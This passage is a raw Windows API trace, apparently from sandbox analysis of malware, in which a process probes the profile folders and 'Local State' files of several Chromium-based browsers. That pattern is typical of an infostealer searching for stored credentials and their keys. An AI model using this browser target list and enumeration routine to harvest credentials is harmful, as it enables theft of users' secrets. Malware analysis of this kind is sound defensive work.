ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x10, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x74fcd0, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.154] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.154] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\CentBrowser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\" [0109.154] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\" [0109.154] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\" [0109.154] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\Local State" [0109.154] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0109.154] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8e) returned 0x3970048 [0109.154] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=71, lpWideCharStr=0x3970048, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\Local State") returned 71 [0109.154] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.154] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.155] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\centbrowser\\user data\\local state")) returned 0xffffffff [0109.155] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.155] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] GetLastError () returned 0x3 [0109.155] SetLastError (dwErrCode=0x3) [0109.155] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\CentBrowser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208008a, ftCreationTime.dwLowDateTime=0xa0, ftCreationTime.dwHighDateTime=0x208008a, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x14, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x731878, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.156] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.156] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\7Star\\7Star\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\" [0109.156] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\" [0109.156] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\" [0109.156] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\Local State" [0109.156] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=71, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 71 [0109.156] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x8e) returned 0x3970048 [0109.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=71, lpWideCharStr=0x3970048, cchWideChar=71 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\Local State") returned 71 [0109.156] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.156] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.156] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\7star\\7star\\user data\\local state")) returned 0xffffffff [0109.156] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.156] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.156] GetLastError () returned 0x3 [0109.156] SetLastError (dwErrCode=0x3) [0109.156] GetLastError () returned 0x3 [0109.156] SetLastError (dwErrCode=0x3) [0109.156] GetLastError () returned 0x3 [0109.156] SetLastError (dwErrCode=0x3) [0109.157] GetLastError () returned 0x3 [0109.157] SetLastError (dwErrCode=0x3) [0109.157] GetLastError () returned 0x3 [0109.157] SetLastError (dwErrCode=0x3) [0109.157] GetLastError () returned 0x3 [0109.157] SetLastError (dwErrCode=0x3) [0109.157] GetLastError () returned 0x3 [0109.157] SetLastError (dwErrCode=0x3) [0109.157] GetLastError () returned 0x3 [0109.157] SetLastError (dwErrCode=0x3) [0109.157] GetLastError () returned 0x3 [0109.157] SetLastError (dwErrCode=0x3) [0109.157] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\7Star\\7Star\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208008a, ftCreationTime.dwLowDateTime=0xa0, ftCreationTime.dwHighDateTime=0x208008a, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x14, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7317d8, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.157] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.157] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Elements Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\" [0109.157] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\" [0109.158] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\" [0109.158] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\Local State" [0109.158] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0109.158] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x98) returned 0x3970048 [0109.158] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=76, lpWideCharStr=0x3970048, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\Local State") returned 76 [0109.158] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.158] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.158] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\elements browser\\user data\\local state")) returned 0xffffffff [0109.158] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.158] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.158] GetLastError () returned 0x3 [0109.158] SetLastError (dwErrCode=0x3) [0109.158] GetLastError () returned 0x3 [0109.158] SetLastError (dwErrCode=0x3) [0109.158] GetLastError () returned 0x3 [0109.158] SetLastError (dwErrCode=0x3) [0109.158] GetLastError () returned 0x3 [0109.158] SetLastError (dwErrCode=0x3) [0109.158] GetLastError () returned 0x3 [0109.159] SetLastError (dwErrCode=0x3) [0109.159] GetLastError () returned 0x3 [0109.159] SetLastError (dwErrCode=0x3) [0109.159] GetLastError () returned 0x3 [0109.159] SetLastError (dwErrCode=0x3) [0109.159] GetLastError () returned 0x3 [0109.159] SetLastError (dwErrCode=0x3) [0109.159] GetLastError () returned 0x3 [0109.159] SetLastError (dwErrCode=0x3) [0109.159] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Elements Browser\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080094, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080094, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed1a8, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.159] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.159] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\TorBro\\Profile\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\" [0109.159] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\" [0109.159] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\" [0109.159] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\Local State" [0109.159] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x40) returned 0x29a1478 [0109.159] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=64, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0109.159] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x3970048 [0109.160] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=64, lpWideCharStr=0x3970048, cchWideChar=64 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\Local State") returned 64 [0109.160] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x80) returned 0x29a11c0 [0109.160] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.160] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\torbro\\profile\\local state")) returned 0xffffffff [0109.160] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.160] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.160] GetLastError () returned 0x3 [0109.160] SetLastError (dwErrCode=0x3) [0109.161] GetLastError () returned 0x3 [0109.161] SetLastError (dwErrCode=0x3) [0109.161] GetLastError () returned 0x3 [0109.161] SetLastError (dwErrCode=0x3) [0109.161] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\TorBro\\Profile\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208007c, ftCreationTime.dwLowDateTime=0x90, ftCreationTime.dwHighDateTime=0x208007c, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x12, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x739830, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.161] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.161] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Suhba\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\" [0109.161] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\" [0109.161] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\" [0109.161] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\Local State" [0109.161] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=65, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 65 [0109.161] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x82) returned 0x3970048 [0109.161] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=65, lpWideCharStr=0x3970048, cchWideChar=65 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\Local State") returned 65 [0109.161] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x90) returned 0x29a11c0 [0109.161] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.161] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\suhba\\user data\\local state")) returned 0xffffffff [0109.161] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.161] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.161] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] GetLastError () returned 0x3 [0109.162] SetLastError (dwErrCode=0x3) [0109.162] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Suhba\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x208007e, ftCreationTime.dwLowDateTime=0x90, ftCreationTime.dwHighDateTime=0x208007e, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x12, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x739950, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.162] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.162] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Rafotech\\Mustang\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\" [0109.163] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\" [0109.163] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\" [0109.163] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\Local State" [0109.163] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=76, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 76 [0109.163] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x98) returned 0x3970048 [0109.163] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=76, lpWideCharStr=0x3970048, cchWideChar=76 | out: lpWideCharStr="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\Local State") returned 76 [0109.163] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0xa0) returned 0x29a11c0 [0109.163] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x3970048 | out: hHeap=0x29a0000) returned 1 [0109.163] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\Local State" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\rafotech\\mustang\\user data\\local state")) returned 0xffffffff [0109.163] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a11c0 | out: hHeap=0x29a0000) returned 1 [0109.163] HeapFree (in: hHeap=0x29a0000, dwFlags=0x0, lpMem=0x29a1478 | out: hHeap=0x29a0000) returned 1 [0109.163] GetLastError () returned 0x3 [0109.163] SetLastError (dwErrCode=0x3) [0109.163] GetLastError () returned 0x3 [0109.163] SetLastError (dwErrCode=0x3) [0109.163] GetLastError () returned 0x3 [0109.163] SetLastError (dwErrCode=0x3) [0109.163] GetLastError () returned 0x3 [0109.163] SetLastError (dwErrCode=0x3) [0109.163] GetLastError () returned 0x3 [0109.163] SetLastError (dwErrCode=0x3) [0109.164] GetLastError () returned 0x3 [0109.164] SetLastError (dwErrCode=0x3) [0109.164] GetLastError () returned 0x3 [0109.164] SetLastError (dwErrCode=0x3) [0109.164] GetLastError () returned 0x3 [0109.164] SetLastError (dwErrCode=0x3) [0109.164] GetLastError () returned 0x3 [0109.164] SetLastError (dwErrCode=0x3) [0109.164] FindFirstFileA (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Rafotech\\Mustang\\User Data\\\\*", lpFindFileData=0x19ef78 | out: lpFindFileData=0x19ef78*(dwFileAttributes=0x2080094, ftCreationTime.dwLowDateTime=0xa8, ftCreationTime.dwHighDateTime=0x2080094, ftLastAccessTime.dwLowDateTime=0x19f010, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x15, ftLastWriteTime.dwHighDateTime=0x2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6ed1a8, dwReserved1=0x19efb4, cFileName="þ+\x92w", cAlternateFileName="")) returned 0xffffffff [0109.164] SHGetFolderPathA (in: hwnd=0x0, csidl=32796, hToken=0x0, dwFlags=0x0, pszPath=0x19f438 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0109.164] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpString2="\\Chedot\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\" [0109.164] lstrcatA (in: lpString1="", lpString2="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\" [0109.164] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\", lpString2="\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\" [0109.164] lstrcatA (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\", lpString2="Local State" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\Local State") returned="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Chedot\\User Data\\\\Local State" [0109.164] RtlAllocateHeap (HeapHandle=0x29a0000, Flags=0x0, Size=0x50) returned 0x29a1478 [0109.164] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x29a1478, cbMultiByte=66, lpWideCharStr=0x0, cchWideChar=0 | out: 